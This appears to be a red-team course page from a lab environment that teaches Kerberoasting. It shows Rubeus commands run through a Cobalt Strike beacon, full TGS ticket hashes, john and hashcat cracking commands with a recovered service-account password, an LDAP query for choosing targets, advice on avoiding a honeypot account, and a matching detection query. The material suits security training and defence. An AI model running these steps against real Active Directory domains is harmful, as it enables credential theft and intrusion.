# Kerberoasting

Services run on a machine under the context of a user account. These accounts are either local to the machine (LocalSystem, LocalService, NetworkService) or are domain accounts (e.g. DOMAIN\mssql). A Service Principal Name (SPN) is a unique identifier of a service instance. SPNs are used with Kerberos to associate a service instance with a logon account, and are configured on the User Object in AD.

\\

![](https://files.cdn.thinkific.com/file_uploads/584845/images/76f/0cf/9d9/spn.png)

\\

Part of the TGS returned by the KDC is encrypted with a secret derived from the password of the user account running that service. Kerberoasting is a technique for requesting TGS’ for services running under the context of domain accounts and cracking them offline to reveal their plaintext passwords. Rubeus `kerberoast` can be used to perform the kerberoasting. Running it without further arguments will roast every account in the domain that has an SPN (excluding krbtgt).

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /simple /nowrap

[*] Total kerberoastable users : 3

$krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io*$122A4848378D3CFFEF922BDEAAC3707A$8FE7692C9C318EC7B4630C929AD54F87784B9E52293020E17BB427BD3FD27BA3C491D264BE8082505F3A2C40142703042A7EC3E161828A89003A0FC7C8CC55111FA432C0F0F2ED3488711E3F845CABFAC9141D63D69397741752201561C02DAEB131C1E079CDE112C9203E91B6A55714261AD223DF2B6879C5DF3805362068DFE39EF51C88E35C45ACE05DF4503252478E9AFD69FA21192046C4E3D8ECA7801D460C4C7D6AF7026AA3A2235A584DA1CA29C16AB7BDF9B307F3EBE6DCA84B9ABEE66ABA070613293DD91EB89B33B6633EB3EB906350C9AED9AD03EE306743024C09AA9AE26582460164BC3160FE95284F33174B3263EEA22E270F9A2D274390BA4546C110E44D7A678F8E286FCBAC660FBF8A0F7CBD72F1FA71BE7F59661CD75847FB7882F8481DC3ABB665CBA7BAAB0600D1E11131E4FB1C0690FCB20D707D2B7906E38381116FCEB8E5F9DAA882A95A4F3D04CB890C6C24EA997361881AFE3003828F759E96AAFC23EB589EC778352C9C5E0109BE110E01A12AB8D15383BA0714EC68B9A666CA42488B3438B1D52517F6A0F94CA8A1A2B93D12B815C32E721F71DC1D5C34ED4D7E5FB11E8AA1E9CB0CDE6BC997E6DB5A3A29EE329337243488A1902F0F66271DF224080A6FED34313A9253F523766F6EB6523E661E425E98302596B4649FE97D566534CE6DAAB323C5118163D160D1747AE3776FFBECA7A7F4E7FAB55833268D529A16DE926F3B86854F4D662306462BDBBBC55421D8AA3C059D981A168C25663A676401A86F8AA9CC9F6A71B7C2C0B8500D78683B2FD39C74F228F83F4D9C1AFB051E91C5A59278B010B1DAA05DB799B170BD3422B74FBE068CB5BF980037A4B907DF8930379A79BFCEBF54B8AF22E22565EDE399A18FAFBC4F09ADF82C4446FAC2169174CBADD49518C286A67B320AF445AD12892497F2D0152C92145463CAD6C99AA5F331FBEE04BCD05CFE1D40C3DFFC3C1140743C1A31A814EEEE5199365AB332EA1F681D62D7B3FE2C0C2F02005B63482F110FF43B9BF1C743F0E4ECC62AEC2914C6A5965CC18F13DBF40959F6E7AD9893FC046D2E5B60F1415F83D522A2B7F0A0B32FC5E5F514165F4B0D2B661162550CE578B43653AF471FA119EAD12DA26FE778362458AAF58E94413B2814A0A1A215118BFD6B0F3BCC4B9AC9D28D51E1279F719D7E0B0CB33824E778CA77F92E0E3A28FAE76A107920734B2D9D81F4E35EBFA3C37E84EBD0CB72C2507CB2627ED3AA8CE32647CFADC288967BFA12F21C3F3A2FBDF6AC64A8743853337D086338ED0AAE6AB3594B78B2926E9DC02DE962D41B9146E0F7718E1C7EA2CB334C40B43C1294C88C68B17A813AD0C15AA8238FF81DB14EB5AB56C7E6ABE56CD0BB9FA02761E1838D0FC894F7E5B627AC959FFB6DE2E235830A5FAEE8D58FDC3098EC20E64D56323CC8C47987AA5B85E6CB165F36B5A6AE9499F6593E13B81F501D7430BFBADF7B03EFD1F65869F801AE78A22165D862132194B96A68ECA2F55BE3338346FBAF836C4D61AF9F7FC012C5F14B220C62349A130E6F4C8A1620866A370C2A433AE36C08E2E496CC833824C0873C5B5D7A8DA38A2C41CC89ADEA62F22B3CB47445D60116BE97EE96AC85C6F7E087AAC4C2
$krb5tgs$23$*squid_svc$dev.cyberbotic.io$HTTP/squid.dev.cyberbotic.io@dev.cyberbotic.io*$F819F7E05FCE5C6861D65E38E65ADF6C$A17248D5456E6A9641F60D9B4EB6AFA69373DFF265153E4E4663E4D01613D496D5AA45D14A5FD672412B25998342DA1D7894066CD47BF8B5C0805807E744937AC60B4AD19067C1D900B7A2ED4493EC6B77AE8FBC5F20DFF1D47BCB1F259C72FEA4219A1AAAE1BB1776491F364B1B5BA69D72015EEEFDB57F688D508DCE63312C5407D2E6347B6D30528ACC4464837DAE6820E0F27CCBA7A36B89B8BA5F782B48FFAEDB349D79571B58F7303579627E493B101F90613CDA0013FF27DD558E7E81CCF82B2953AEF650D8DFEAAAF427CD981CB85D57FCABCEA551303B1EE3AED2B542372599FC2C92A0CCDE8482D3B4344EA8DC7B0AEEBD0D24B5F79996E9BC758C28FCE9491D97B9CBEC80D28D8043E1B761703D20A6CAAF04255C082AC64392C4B6C8FF32585605342E07622DE9C2CDAF21BFFB7FEAB1FF19C2AD5D89340CC51D5B5AE50F702E2E45FA01C26DB5086E1FBBC67133F522BFC4A18D77630DAA174633E0E4DFF59737171606BB74C96C8B109AE5DB2BF49F464274D65FF3740B2EB8AE378AEB7E20D7607C785939673E2E8166DA88A274EA247388E6A18EF4B67600F0092F70BDAF0FF440D7C244A520A8CF0A6482CE837C6A927026DF6C0C27228C3039192D8B2B260C45C831609F89ED5B88D364E7327520850FD72072591B938E3412FBFF71FDB32B8A99117377C7B23783564CFD414FA114E45B497C90CEED124F9B291FBE422F824D86F426C0D6616AF4A9EADD21D7EE7370B9AFD1DBE66709D7D7963FF626BB9849C12A2252166BD586A67961935C761F42A03E8CEDB84435546474FAFB951DA4AA878A64C9EADD10962756B2455BBF7AA844FA17A5D158D27B6926FAFF930103861D229C4E15F1CDF7856AF55382F8054E3E00853BF924AEC68EAFD2786849FDE0E0B7D19DEA51029D1240BF832EB5C55D862FBE769A7A2D3F83475A46F80679B7E35FD58A0E6E4848E2CA1C82A6ECA2AC01201BB71F659987B7AB45B74A9CA524022752F6392199951B5B8AC032B8774989051B7FE21A9A9B207D50FC83D1337E31D1F5AF969174E78BC0C50496552E8CA6DCC681D88C59D199D594C4648C75D8FA6D5EFB9876E5E32088560DAD793BDF80A20389AB7E6444AA301736FA89F1EB622D590C8381FD6B97579525EBD4933B3768399A3480C42AE0F768F643528DDCC5A679156AADE780DB37CA61CF3AFAEE2ECF8996122C7C4A8A679C3DC99A1428801AED1D7C91574D6A50A79325FDC7C58FA85FE410D4F311451387C69691B0B37A0CCF890F8F725286C0AD28DB6294A8DC04346AC0167FAC80E4C041C31D2BDFCF948F4A82D843D4A928F3244868084C853B8E73B166E3C25F7E043F9A833CDF939476913E1D0795B10BB8709A11E41D1A20096E41F13F7703540F713F4EDD73D3B5EAAE904EE1305D960047DD6A27ADD3E06204403A76364369DD7395E84BE660147FD4893904B4B0F01355D0961D65D1BAAA97DC7EDD3321D8E6AE13EED9F070DEC8D4C70C3F67AEC23084CF6526252EA23B979463B8BE53CFC81909E6FA50D59A73878275F79BCB484BDB60BD3C1A9EAEA4EF613D7995BF5DB9E0C1D7D222D138C65C20155CD17697E6014F608BC78993EF2F8BDE339532C2F5587981579C7FBB
$krb5tgs$23$*honey_svc$dev.cyberbotic.io$HoneySvc/fake.dev.cyberbotic.io@dev.cyberbotic.io*$B6424DAD1372B0E769F64D78848770BA$C2DE3B1FE0FA17EA680043183615A9280A6DAFB5A6A2FA43D6077E4542EACEBBCE2C8D299F1827A94AC9768D5211127A5734586FCD8FD929B12D64C1D72E8ADD2B0A051E8F21EBA9E6631CA775B287E6CA6071550AB27EE950A58B85E80B0C19B63537DC086BE7B44AFF685B232DED804645A7E2DC2A7967E6B7E44BFCAA67CCFEDD74EF1FFC73D7006FAD32B281EF1AF78650757C30BE64394475113176117C050766D5C8B8B3FA8D7226038AD0FF498FFA609B320233FC27C2772C3B92C9259DCDA26C069A5B1BFA14037D8E65F85F02BE1FA3AE567A1C6E6EFC9464E5B313B78588D9B6776701C67D3A514DC5A133B422C624224632FFCD50A5C20B7AAA7B04D692EA64E33A2B3A39B3F0DE58EEC4E3C9D14AB870797325D773CD477B3D498FB82CB8BC06FF4E1DC954465E9077642F050C59E296C05E8F4674F3411739E9C4CF0DF88E6CD68EF32B1D820379F6256CE5EE9EE10177F56BE9E364A59C9EFE3B07D6798EB8373D8EC5367D7C7DD402742264DEAEA939404CBA1673AAB05B6BC56C5FA9CDA7B67A0E330DF7C2E440713FF4F129B8E4A3E5F2A9294BD45BD0E9DBEC63377E87551C374D8D7FF19376A1ADABEBC579D9C607CA7FC8198598BC36D0F4DC799FA89EFABCACDB5AB4BD3498A212C59D3DF93FE008F5B71889633158A942411189496D4958812A71EA344B2F65F6CF5F94F99D12C84F56F25B92489D148C140ACC8D40D5DEC2C6C5B4892060D6806186A38E72CB9183B7391C3FAD8D104B0675C83F568608DA966D172B8588441F0838A5F6EFD354EEF6448F41DABB904A2FA724439B3AC96E035A35CCA9C993B5545A1771D11BE4F82CE1D58CEFFACF889099A81349DFE45D2C73CED9B85550D3C7B1B6624D9C5639DBBEA0B45F3990A5CFDC8B3DF697E12FB7800779575FB897761F0674B89A8D713EF0F744A64C824DAE6269C5BEE1A85F2434E2E8CC283F42C697EF1A74C7C522002301D4CB929A3E715BAF939978F9DD792005CFFA6FAB35D536C4092AA621D7CBC9B3302281BC66B904FA1C5687C981276D59409E794806BE340976D0DD5198E631B9D76BF57AFFB8C4D1F3913F3549A99E90D85CA58AE2C2838F4BB5093BA0F7CDC37F7D1281FB60929B3F9B0473AEE8F7AD4BCE08B1375F2222903F2C860F04D26DAF9D06A0E5E6A3312046A54C1E4DE57EBA411879DFA4420BA4AC854CA8830A56C4F7AA5D4082E16FFA99D297E58837C872D6B8AA0D38FD12EB70AB31FCDF104705DD26E5A38AE58B5633955ED4830E7590CA4C067C31C05861B2AF9EC3C408E2BF0256896B4242926B8A1A7D0221E93355AF0E64861A44CEE50DE6A65F6A767646F7961BC0866B4107BEFC6CD0AA3E682528E74B848A41A21293FD1CD222304FD2142F12BB85511B72FD22E82B94DA21D3B4AD098B016D9D5181E446CA8FD7D98F4784BEE65BD648074ABAB39849B784BF362EFACE9B210C8ECF550BFD7A74C207D4A05C9AD0FD4DCDCB135F421ADF69AEBF21DDA3716079E80B7A039C77DA8802A8D5463652ACD401E1DA06D4FBC4519AA657D19AE808C59693B45AA29328F2061183193A1D14F77A866B7E9AC8C381E5E9BE8BB621E05E71B5C6489B9BE105838415555FDAB70B71D2A7E750B8
```

Even though Rubeus does not include the `krbtgt` account, it can [sometimes](https://twitter.com/_wald0/status/1361720293539139589) be cracked.

\\

These hashes can be cracked offline to recover the plaintext passwords for the accounts. Use `--format=krb5tgs --wordlist=wordlist hashes` for john or `-a 0 -m 13100 hashes wordlist` for hashcat.

```
$ john --format=krb5tgs --wordlist=wordlist mssql_svc
Cyberb0tic       (mssql_svc$dev.cyberbotic.io)
```

\\

I experienced some hash format incompatibility with john. Removing the SPN so it became: `$krb5tgs$23$*mssql_svc$dev.cyberbotic.io*$6A9E[blah]` seemed to address the issue.

\\

**OPSEC**\
\
By default, Rubeus will roast every account that has an SPN. Honey Pot accounts can be configured with a "fake" SPN, which will generate a 4769 event when roasted. Since these events will never be generated for this service, it provides a high-fidelity indication of this attack.\
\\

```
event.code: 4769 and winlog.event_data.ServiceName: honey_svc
```

\\

A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.

```
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName

[*] TOTAL NUMBER OF SEARCH RESULTS: 4
	[+] cn                   : krbtgt
	[+] servicePrincipalName : kadmin/changepw
	[+] samaccountname       : krbtgt
	
	[+] cn                   : MS SQL Service
	[+] servicePrincipalName : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
	[+] samaccountname       : mssql_svc
	
	[+] cn                   : Squid Proxy
	[+] servicePrincipalName : HTTP/squid.dev.cyberbotic.io
	[+] samaccountname       : squid_svc
	
	[+] cn                   : Honey Token
	[+] servicePrincipalName : HoneySvc/fake.dev.cyberbotic.io
	[+] samaccountname       : honey_svc
```

\\

We can roast an individual account the `/user` parameter.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:mssql_svc /nowrap

[*] SamAccountName         : mssql_svc
[*] DistinguishedName      : CN=MS SQL Service,CN=Users,DC=dev,DC=cyberbotic,DC=io
[*] ServicePrincipalName   : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
[*] PwdLastSet             : 8/15/2022 7:46:43 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*mssql_svc$dev.cyberbotic.io$MSSQLSvc/sql-2.dev.cyberbotic.io:1433@dev.cyberbotic.io*$122A4848378D3CFFEF922BDEAAC3707A$8FE7692C9C318EC7B4630C929AD54F87784B9E52293020E17BB427BD3FD27BA3C491D264BE8082505F3A2C40142703042A7EC3E161828A89003A0FC7C8CC55111FA432C0F0F2ED3488711E3F845CABFAC9141D63D69397741752201561C02DAEB131C1E079CDE112C9203E91B6A55714261AD223DF2B6879C5DF3805362068DFE39EF51C88E35C45ACE05DF4503252478E9AFD69FA21192046C4E3D8ECA7801D460C4C7D6AF7026AA3A2235A584DA1CA29C16AB7BDF9B307F3EBE6DCA84B9ABEE66ABA070613293DD91EB89B33B6633EB3EB906350C9AED9AD03EE306743024C09AA9AE26582460164BC3160FE95284F33174B3263EEA22E270F9A2D274390BA4546C110E44D7A678F8E286FCBAC660FBF8A0F7CBD72F1FA71BE7F59661CD75847FB7882F8481DC3ABB665CBA7BAAB0600D1E11131E4FB1C0690FCB20D707D2B7906E38381116FCEB8E5F9DAA882A95A4F3D04CB890C6C24EA997361881AFE3003828F759E96AAFC23EB589EC778352C9C5E0109BE110E01A12AB8D15383BA0714EC68B9A666CA42488B3438B1D52517F6A0F94CA8A1A2B93D12B815C32E721F71DC1D5C34ED4D7E5FB11E8AA1E9CB0CDE6BC997E6DB5A3A29EE329337243488A1902F0F66271DF224080A6FED34313A9253F523766F6EB6523E661E425E98302596B4649FE97D566534CE6DAAB323C5118163D160D1747AE3776FFBECA7A7F4E7FAB55833268D529A16DE926F3B86854F4D662306462BDBBBC55421D8AA3C059D981A168C25663A676401A86F8AA9CC9F6A71B7C2C0B8500D78683B2FD39C74F228F83F4D9C1AFB051E91C5A59278B010B1DAA05DB799B170BD3422B74FBE068CB5BF980037A4B907DF8930379A79BFCEBF54B8AF22E22565EDE399A18FAFBC4F09ADF82C4446FAC2169174CBADD49518C286A67B320AF445AD12892497F2D0152C92145463CAD6C99AA5F331FBEE04BCD05CFE1D40C3DFFC3C1140743C1A31A814EEEE5199365AB332EA1F681D62D7B3FE2C0C2F02005B63482F110FF43B9BF1C743F0E4ECC62AEC2914C6A5965CC18F13DBF40959F6E7AD9893FC046D2E5B60F1415F83D522A2B7F0A0B32FC5E5F514165F4B0D2B661162550CE578B43653AF471FA119EAD12DA26FE778362458AAF58E94413B2814A0A1A215118BFD6B0F3BCC4B9AC9D28D51E1279F719D7E0B0CB33824E778CA77F92E0E3A28FAE76A107920734B2D9D81F4E35EBFA3C37E84EBD0CB72C2507CB2627ED3AA8CE32647CFADC288967BFA12F21C3F3A2FBDF6AC64A8743853337D086338ED0AAE6AB3594B78B2926E9DC02DE962D41B9146E0F7718E1C7EA2CB334C40B43C1294C88C68B17A813AD0C15AA8238FF81DB14EB5AB56C7E6ABE56CD0BB9FA02761E1838D0FC894F7E5B627AC959FFB6DE2E235830A5FAEE8D58FDC3098EC20E64D56323CC8C47987AA5B85E6CB165F36B5A6AE9499F6593E13B81F501D7430BFBADF7B03EFD1F65869F801AE78A22165D862132194B96A68ECA2F55BE3338346FBAF836C4D61AF9F7FC012C5F14B220C62349A130E6F4C8A1620866A370C2A433AE36C08E2E496CC833824C0873C5B5D7A8DA38A2C41CC89ADEA62F22B3CB47445D60116BE97EE96AC85C6F7E087AAC4C2
```